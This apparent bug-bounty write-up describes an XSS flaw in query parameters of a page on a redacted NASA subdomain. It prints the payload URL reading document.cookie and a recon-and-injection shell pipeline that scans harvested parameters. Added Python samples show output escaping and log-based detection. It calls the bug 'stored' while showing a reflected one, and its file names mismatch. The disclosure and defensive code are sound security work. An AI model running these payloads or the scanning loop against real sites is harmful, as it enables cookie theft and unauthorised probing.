Stored XSS Found in Query Parameters of dhtmlxGrid.js on NASA.gov Subdomain (P3)


Aleenscode

October 10, 2024
By ALEENS

Introduction

Stored Cross-Site Scripting (XSS) is a critical security vulnerability that occurs when an application accepts and stores untrusted data, which is later served to users without proper validation or sanitization. This flaw allows attackers to inject malicious scripts into web pages that are then executed when viewed by other users.

During a security assessment of the XXX.gov subdomain, I discovered a stored XSS vulnerability in the query parameters of a specific page. This issue poses various risks to users and the integrity of the application.

Vulnerable URL

Here is the URL where the stored XSS vulnerability was found:

https://xxxx.xxxx.gov/GLOBE/dhtmlxGrid.jsp?mode="%3E%3Cscript%3Ealert%28ALEENS_CODE%29%3C%2Fscript%3E&result_type="%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&table="%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
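To make the mechanism behind that URL concrete, here is an added illustration (not code from the write-up or from the dhtmlxGrid project): a hypothetical rendering routine that drops the mode, result_type and table values straight into HTML attributes, beside a hardened version that HTML-encodes them first. The host name, the attribute layout and the sample URL are constructed for the example, and the payload is a harmless alert(1) rather than the cookie-reading one in the report.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample URL modelled on the one in the write-up; the host is a placeholder.
SAMPLE_URL = (
    'https://example.invalid/GLOBE/dhtmlxGrid.jsp'
    '?mode="%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
    '&result_type=plain&table=t1'
)

# Hypothetical page template: three query parameters end up inside HTML attributes.
TEMPLATE = '<div data-mode="{mode}" data-result-type="{result_type}" data-table="{table}"></div>'


def params_from_url(url):
    """Return the first value of each query parameter, percent-decoded (as a server would see it)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {key: values[0] for key, values in qs.items()}


def render_unsafe(params):
    """Vulnerable rendering: raw values are concatenated into the attribute context.

    A value beginning with '">' closes the attribute and the tag, so anything after it
    is parsed as new markup by the browser.
    """
    return TEMPLATE.format(**params)


def render_escaped(params):
    """Hardened rendering: encode every value for the HTML attribute context.

    html.escape(quote=True) turns  "  into &quot; and < > into &lt; &gt;, so the value
    cannot terminate the attribute or start a new tag.
    """
    safe = {key: html.escape(value, quote=True) for key, value in params.items()}
    return TEMPLATE.format(**safe)


def has_script_tag(markup):
    """Simple check used to compare the two renderings: does the output contain a real <script tag?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    params = params_from_url(SAMPLE_URL)
    print("unsafe :", render_unsafe(params))
    print("escaped:", render_escaped(params))
```

Running the block prints the two renderings side by side: the unsafe one contains a live script element, the escaped one contains only entity-encoded text that the browser displays but never executes. Encoding at the point of output, in the context the value lands in, is the fix; stripping the word "script" from input is not, because the same value may be reflected into other contexts later.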

Potential Impact of XSS Vulnerabilities:

Stored XSS can have severe consequences, including:

Session Hijacking: Attackers can steal session cookies, impersonating legitimate users.
Data Theft: Sensitive information can be exfiltrated to the attacker’s server.
Malicious Redirection: Users can be redirected to harmful websites.
Defacement: Attackers can alter the appearance and functionality of the web application.

Methodology

The vulnerability was discovered using the following steps:

1. Subdomain Discovery
We began by identifying all subdomains related to XXX.gov using Subfinder. The following command was used:

subfinder -d XXX.gov -o Subs01.txt

2. Website Status Verification
Next, we verified which subdomains were active using httpx, a fast HTTP toolkit:

cat Subs01.txt | httpx -o AlliveSubs_XXXX.txt

3. Wayback Machine URL Extraction
To uncover historical URLs that may still be live, we leveraged the Wayback Machine:

cat AlliveSubs_XXXX.txt | waybackurls | tee urls_globe.txt

4. Parameter Extraction
We then extracted parameters from the URLs to identify potential vectors for attack:

cat urls_XXXX.txt | grep '=' | tee param_urls.txt

5. XSS Vulnerability Testing
Finally, we tested the extracted parameters for XSS vulnerabilities. Using a specific payload designed to trigger an alert with document cookies, we executed:

cat param_sub_nasa.txt | grep '=' | qsreplace '"><script>alert(document.cookie)</script>' | while read -r url; do
curl -s "$url" | grep -q "alert" && echo "[XSS Found] $url"; done

6. XSS Discovery

During this testing phase, we discovered an active XSS vulnerability in one of the subdomains.

The methodology outlined above provides a structured approach to subdomain enumeration and vulnerability assessment, particularly for XSS. The discovery underscores the importance of conducting thorough security testing on web applications to identify and mitigate potential threats.
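From the defending side, the same probing is visible in web server access logs long before a report arrives. The following added example (not part of the original write-up) parses Combined Log Format lines, percent-decodes each request's query string and flags requests whose parameters contain a script tag or an attribute-closing `">`; a hit with a 200 status against a page that reflects its parameters is exactly the condition the write-up describes. The IP addresses, timestamps and log lines are constructed for the example.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Combined Log Format lines; IPs are documentation ranges and the
# probe line carries the same harmless alert(1) payload used elsewhere on this page.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2024:12:00:01 +0000] "GET /GLOBE/dhtmlxGrid.jsp?mode=grid&table=t1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2024:12:00:02 +0000] "GET /GLOBE/dhtmlxGrid.jsp?mode=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&table=t1 HTTP/1.1" 200 5200 "-" "curl/8.0"
198.51.100.7 - - [10/Oct/2024:12:00:03 +0000] "GET /index.jsp HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2024:12:00:04 +0000] "GET /GLOBE/dhtmlxGrid.jsp?result_type=xml HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
"""

# ip, ident, user, [timestamp], "METHOD target PROTOCOL", status  (remainder ignored)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Heuristic for markup injection in a query string: an opening or closing <script> tag,
# or a quote followed by '>' (the attribute break-out seen in the reported URL).
MARKUP_RE = re.compile(r'<\s*/?\s*script\b|["\']\s*>', re.IGNORECASE)


def decode_query(target):
    """Percent-decode the query string of a request target so encoded tags become visible."""
    return unquote(urlsplit(target).query)


def is_xss_probe(target):
    """True when the decoded query string contains markup characteristic of XSS probing."""
    return MARKUP_RE.search(decode_query(target)) is not None


def scan_log(text):
    """Return one record per flagged request: who sent it, when, to which path, and what the server answered."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # malformed or non-matching line; a real pipeline would count these
        target = match["target"]
        if is_xss_probe(target):
            hits.append({
                "ip": match["ip"],
                "ts": match["ts"],
                "status": int(match["status"]),
                "path": urlsplit(target).path,
                "query": decode_query(target),
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["status"]} {hit["path"]} ?{hit["query"]}')
```

The detector is deliberately narrow: it looks for the two constructs the report relies on and nothing else, so it produces few false positives on ordinary traffic. In practice the flagged records would feed an alert keyed on source address and target path, and a burst of such requests against a single JSP endpoint is the signal that the parameter handling on that page needs the output encoding shown earlier.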

Severity Level: High
CVSS 3.1 Score: 7.5 (High)